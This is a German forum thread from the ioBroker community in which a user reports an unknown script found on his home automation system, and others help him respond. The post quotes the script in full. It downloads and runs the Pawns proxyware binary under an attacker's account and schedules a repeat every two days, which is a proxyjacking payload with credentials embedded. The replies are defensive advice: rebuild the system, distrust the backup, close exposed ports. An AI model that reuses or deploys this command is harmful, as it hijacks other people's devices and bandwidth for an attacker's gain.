NEWS
[gelöst]Seltsames Script unter Global
-
@crunchip
Ich nehme an das Script ist schon länger drauf und ist über das Backup wieder drauf gekommen.
Wie könnte ich prüfen ob die Installation durchgeführt wurde?Möchte das nicht ausschließen, dass ich mal einen Port offen hatte in der Vergangenheit aber jetzt auf keinen Fall.
@chemieka ich bin da kein Spezialist für
da steht bisserl Hintergrund info
https://netzpalaver.de/2023/04/12/cyberkriminelle-entdecken-proxyjacking-als-neue-einnahmequelle/ -
@chemieka ich bin da kein Spezialist für
da steht bisserl Hintergrund info
https://netzpalaver.de/2023/04/12/cyberkriminelle-entdecken-proxyjacking-als-neue-einnahmequelle/@crunchip
Der Hintergrund ist mir bekannt bzw. schon gelesen.
Könnte man irgendwie erkennen ob die Installation drauf ist? Seltsam ist auch, die Dateien im Tmp sind vom Anfang Juni. Das System aber zwei Tage alt. Hm.
Ich glaube ich mache nochmal eine neue Karte fertig und schau mal dann. -
@chemieka sagte in Seltsames Script unter Global:
device-name=xxxxxxxxxx@io
was auch komisch ist ...das xxxxxxxxxxxxxxXXXXXXXXXXXXXXX
Hast du eine DynDNS Service
EDIT :
DynDNS von @chemieka unkenntlich gemacht
@glasfaser sagte in Seltsames Script unter Global:
@chemieka sagte in Seltsames Script unter Global:
was auch komisch ist ...das ich auch dein Username ...
Hast du eine DynDNS Service
Was ist hiermit !?
Bist du bei der Telekom . Fritzbox . und hast die IP am Ende mit 06 !?
-
@glasfaser sagte in Seltsames Script unter Global:
@chemieka sagte in Seltsames Script unter Global:
was auch komisch ist ...das ich auch dein Username ...
Hast du eine DynDNS Service
Was ist hiermit !?
Bist du bei der Telekom . Fritzbox . und hast die IP am Ende mit 06 !?
-
@glasfaser
Ja das stimmt schon, werde das mal ändern. Aber ein Port zu IOBroker ist nicht offen. -
@chemieka sagte in Seltsames Script unter Global:
Ja das stimmt schon,
Die DynDNS ist von dir selber oder die IP mit der 06 !?
-
@glasfaser
beides. -
Dann sage doch ... du hast auch gerade dazu den Start Thread bearbeitet , mit xxx
denn ich habe die DynDNS Adresse in meinem Post auch drin !!!
Werde Ihn dazu editieren !!@glasfaser
Ja bitte. System mal neu Aufsetzen. -
Hallo
Ich habe hier ein Script unter Global stehen welches ich nicht selber installiert habe.
Wenn ich mir das anschauen, denke ich mir da ist was faul.
Der Inhalt wäre folgendes:exec('cd /tmp ; wget https://download.iproyal.com/pawns-cli/latest/linux_armv7l/pawns-cli ; chmod +x pawns-cli ; ./pawns-cli -email=ryanreynolds284@protonmail.com -password=goodluck999! -device-name=xxx@io --accept-tos'); schedule("10 6 */2 * *", async function () { exec('cd /tmp ; wget https://download.iproyal.com/pawns-cli/latest/linux_armv7l/pawns-cli ; chmod +x pawns-cli ; ./pawns-cli -email=ryanreynolds284@protonmail.com -password=goodluck999! -device-name=xxx@io --accept-tos'); });Das Script habe ich gestoppt. Denke aber mal das da ein Plugin installiert worden sein könnte. Wie könnte ich das finden und wieder löschen? Was sagt ihr?
Unter tmp liegt dann auch so ein Müll welchen ich nicht gelöscht bekomme.
@chemieka
so ein system ist nicht mehr vertrauenswürdig.
wer weiß was da noch so auf dem system drauf ist oder sich
über so eine anwendung mit drauf gepfriemelt hat.eigentlich bleibt nur noch eins,
alles platt machen
neu aufbauen
ob du dem backup noch vertraust musst du selber überlegen
ich würde es nicht. -
@glasfaser
beides.@chemieka sagte in Seltsames Script unter Global:
@glasfaser
beides.Große Frage ... wie kommt Mister X an deine DynDNS ,
hast du Sie in ioBroker oder wo anderes auch hinterlegt !? -
@chemieka
so ein system ist nicht mehr vertrauenswürdig.
wer weiß was da noch so auf dem system drauf ist oder sich
über so eine anwendung mit drauf gepfriemelt hat.eigentlich bleibt nur noch eins,
alles platt machen
neu aufbauen
ob du dem backup noch vertraust musst du selber überlegen
ich würde es nicht. -
@chemieka sagte in Seltsames Script unter Global:
@glasfaser
beides.Große Frage ... wie kommt Mister X an deine DynDNS ,
hast du Sie in ioBroker oder wo anderes auch hinterlegt !?wer einmal im netz ist, kann ja theoretisch alle rechner erreichen.
wenn auf diesen dann auch eine laxe security existiert, dann ist nix sicher.
nas/samba-freigabe ohne passwort?
windows ohne passwort?
raspberries mit standard login?
nas mit standard login?
etc.als Ergänzung zu meinem obigen post. theoretisch ist das ganze netz verunreinigt.
-
@oliverio
So mache ich das. Das Script lösche ich dann ein Backup machen. Alles neu erstellen.@chemieka sagte in Seltsames Script unter Global:
@oliverio
So mache ich das. Das Script lösche ich dann ein Backup machen. Alles neu erstellen.und du bist sicher, das sich in deinen anderen skripten nix sonstiges verbirgt?
oder in einem der npm module nix eingebaut wurde?
dann bitte alles detailliert vorher begutachten, bevor du iobroker wieder startest.
derjenige der das gemacht hat, hat detailkenntnisse von iobroker.
das ist kein automatisierter angriff, bei denen zu 99% eh alles fehlschlägt, da die systemumgebung nicht passt. -
@chemieka sagte in Seltsames Script unter Global:
@oliverio
So mache ich das. Das Script lösche ich dann ein Backup machen. Alles neu erstellen.und du bist sicher, das sich in deinen anderen skripten nix sonstiges verbirgt?
oder in einem der npm module nix eingebaut wurde?
dann bitte alles detailliert vorher begutachten, bevor du iobroker wieder startest.
derjenige der das gemacht hat, hat detailkenntnisse von iobroker.
das ist kein automatisierter angriff, bei denen zu 99% eh alles fehlschlägt, da die systemumgebung nicht passt. -
@oliverio
Ich schaue so genau wie möglich hin. Danke bis hierhin. Gibts ja nicht was alles so möglich ist. -
@chemieka sagte in Seltsames Script unter Global:
Gibts ja nicht was alles so möglich ist.
Nur mal nebenbei , schau in deiner Fritte ... warum Port 5555 offen ist !
Und ... ändere deine DynDNS !!!!!
-
@glasfaser
Mach ich, ich hatte auch schon gescannt. Muss schauen, auf den ersten Blick mir nicht bekannt. Danke.
Support us
869
Online32.4k
Users81.5k
Topics1.3m
Posts